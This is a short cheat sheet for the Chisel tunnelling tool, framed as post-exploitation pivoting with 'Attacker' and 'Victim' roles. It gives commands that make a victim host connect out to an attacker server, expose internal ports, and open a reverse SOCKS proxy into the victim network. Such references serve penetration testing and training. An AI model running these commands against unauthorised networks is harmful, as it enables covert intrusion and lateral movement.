Chisel Command List
Chisel Command Guide
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. It is the modern alternative to SSH tunneling because it's a single binary and works over HTTP (firewall friendly).
Top 10 Useful Commands
1. Server Mode (Attacker)
chisel server -p 8000 --reverse
Explanation: Listen on 8000, allow reverse tunnels (--reverse).
2. Client Mode (Victim) - Reverse Proxy
chisel client 10.10.10.10:8000 R:80:127.0.0.1:80
Explanation: "Make my local port 80 appear on the server's port 80". Exposes an internal service to the attacker.
3. SOCKS5 Proxy (The Magic Command)
chisel client 10.10.10.10:8000 R:socks
Explanation: Connect to server and open a SOCKS proxy on the server. Attacker can now use Proxychains to browse the Victim's network.
4. Port Forwarding (Local)
chisel client 10.10.10.10:8000 9000:google.com:80
Explanation: Forward local 9000 to remote google:80 via the tunnel.
5. Authentication
chisel server --auth "user:pass"
Explanation: Require password for tunnels.
6. Keepalive
chisel client ... --keepalive 10s
Explanation: Send ping to keep connection open.
7. Verbose
chisel server -v
Explanation: Debug logs.
8. Fingerprint Hide
# (Chisel uses websockets/http, looks like web traffic)
9. Forward UDP
chisel client ... 53:1.1.1.1:53/udp
Explanation: Support UDP tunneling.
10. Help
chisel --help
The Most Powerful Command
Server (Attacker): chisel server -p 8000 --reverse
Client (Victim): chisel client 10.10.10.10:8000 R:socks
Explanation: This single pair of commands gives you a full VPN-like capability to access ANY internal IP address of the victim network using Proxychains.